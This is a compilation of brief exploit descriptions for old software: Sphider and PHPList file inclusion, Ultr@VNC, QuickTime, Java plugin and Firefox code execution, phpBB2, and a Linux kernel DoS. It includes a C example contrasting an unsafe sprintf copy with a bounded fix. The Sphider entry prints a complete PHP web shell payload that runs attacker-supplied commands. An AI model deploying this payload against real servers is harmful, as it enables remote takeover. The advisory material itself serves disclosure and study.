Sphider <= 1.3 is vulnerable to remote file inclusion. The exploit works when register_globals = On and allow_url_fopen = On. It requires a small PHP script to be hosted at the remote location; once that script is included by the vulnerable page, it prints the marker 56789 and then runs the command passed in the 'cmd' parameter. The script is as follows: <?php ob_clean();if (get_magic_quotes_gpc()){$_GET["cmd"]=stripslashes($_GET["cmd"]);}ini_set("max_execution_time",0);echo 56789;passthru($_GET["cmd"]);die;?>
A buffer overflow vulnerability exists in the Ultr@VNC 1.0.1 client. Since the flaw is on the client side, an attacker who runs a malicious VNC server on the standard VNC port (5900) can send a specially crafted packet to a connecting client to trigger the overflow and execute arbitrary code on the client's system. The vulnerability was discovered by Luigi Auriemma and a proof of concept was developed by Paul Haas at Redspin.com. The exploit was tested on Windows XP SP2 and launches calc.exe.
This exploit is based on the user_sig_bbcode_uid bug and is used to execute arbitrary commands on a vulnerable phpBB2 installation. It was tested on versions 2.0.12, 2.0.13 and 2.0.19.
A flaw in PHPList <= 2.10.2 allows an attacker to include arbitrary files from the local filesystem (local file inclusion) when register_globals = On in php.ini.
This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially crafted HTML page, the QuickTime ActiveX control treats a supplied parameter as a trusted pointer and uses it as a COM-type pUnknown, which leads to arbitrary code execution. The exploit uses a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR.
This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before 6 Update 22. By passing specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a 'launchjnlp' parameter, it copies the contents of the 'docbase' parameter into a 256-byte stack buffer using sprintf, which performs no bounds check. A 'docbase' string of 396 bytes is enough to overflow the buffer and overwrite some local variables as well as the saved return address.
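As an added illustration (this is not the plugin's code, which the description above does not reproduce): the unbounded sprintf copy described above, beside a bounded replacement that refuses input that does not fit. The buffer size (256) and the triggering length (396) are taken from the description; the function names, the "%s" copy format and the 'A'-filled test string are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

#define DOCBASE_BUF 256          /* stack buffer size given in the description */

/* Vulnerable pattern as described: the 'docbase' value is copied into a
 * fixed-size stack buffer with sprintf, which never looks at the destination
 * size. With a 396-byte docbase it writes past the buffer into the locals and
 * the saved return address. Illustrative only; never call it with long or
 * untrusted input. */
static void copy_docbase_unsafe(const char *docbase)
{
    char buf[DOCBASE_BUF];
    sprintf(buf, "%s", docbase);   /* no bound: overflows once strlen(docbase) >= 256 */
    (void)buf;
}

/* Number of bytes an unbounded copy of a docbase of length len writes beyond a
 * DOCBASE_BUF-byte buffer (sprintf also writes the terminating NUL). */
size_t docbase_overflow_bytes(size_t len)
{
    size_t written = len + 1;
    return written > DOCBASE_BUF ? written - DOCBASE_BUF : 0;
}

/* Bounded replacement. Rather than silently truncating (a truncated URL is not
 * the URL the caller meant), reject anything that does not fit. Returns 0 on
 * success and -1 if docbase plus its NUL exceeds outsz; out is left empty then. */
int copy_docbase_safe(char *out, size_t outsz, const char *docbase)
{
    if (outsz == 0) return -1;
    int n = snprintf(out, outsz, "%s", docbase);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed test input: a docbase of n 'A' bytes, like the 396-byte string
 * the description mentions. Returns a static buffer; n is capped at 1023. */
const char *make_docbase(size_t n)
{
    static char s[1024];
    if (n >= sizeof s) n = sizeof s - 1;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char out[DOCBASE_BUF];
    printf("a 396-byte docbase overflows a %d-byte buffer by %zu bytes\n",
           DOCBASE_BUF, docbase_overflow_bytes(396));
    printf("bounded copy of 396 bytes returns %d\n",
           copy_docbase_safe(out, sizeof out, make_docbase(396)));
    printf("bounded copy of 200 bytes returns %d, strlen %zu\n",
           copy_docbase_safe(out, sizeof out, make_docbase(200)), strlen(out));
    copy_docbase_unsafe(make_docbase(10));   /* harmless only because the input is short */
    return 0;
}
```

Building with -fstack-protector would turn the unbounded copy into an abort on return instead of a controlled return-address overwrite, but that is mitigation, not a fix; the fix is the length check before the copy.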
This exploit is a local denial of service against the Linux kernel 2.6.16.x. It creates multiple threads that consume all available memory, causing the system to crash. The exploit uses the setsid() system call so that its threads are not counted as a single thread by the oom_killer().
Input passed to the 'rub' parameter in 'lire.php' is not properly verified before it is used to include remote files. Successful exploitation requires that 'register_globals' is enabled. In addition, a remote user can upload jpg, jpeg, gif and bmp files without authentication.
This module exploits a buffer overflow in Apple QuickTime 7.6.6. When processing a malformed SMIL URI, a stack-based buffer overflow can occur while an error message is being logged.
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. It is a Metasploit port of the in-the-wild exploit.